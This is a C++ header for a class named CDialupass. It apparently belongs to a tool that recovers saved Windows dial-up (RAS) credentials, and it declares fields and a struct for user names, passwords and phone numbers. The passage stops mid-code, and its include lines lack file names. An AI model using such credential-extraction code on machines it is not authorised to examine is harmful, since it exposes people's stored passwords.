// Dialupass.h: interface for the CDialupass class. // ////////////////////////////////////////////////////////////////////// #if !defined(AFX_DIALUPASS_H__B0BBD3E2_526C_4B10_A877_95E6D12F31D2__INCLUDED_) #define AFX_DIALUPASS_H__B0BBD3E2_526C_4B10_A877_95E6D12F31D2__INCLUDED_ #if _MSC_VER > 1000 #pragma once #endif // _MSC_VER > 1000 #include #include #include #include #include #pragma comment(lib, "rasapi32.lib") #define STR_DialParamsUID 0 #define STR_Name 1 #define STR_User 2 #define STR_Password 3 #define STR_PhoneNumber 4 #define STR_Device 5 #define STR_MAX 6 typedef struct { char UID[256]; char pass[256]; char login[256]; bool used; }PASSWORDS, *PPASSWORDS; class COneInfo{ private: char *Str[STR_MAX]; public: COneInfo(void) { for(int i=0;i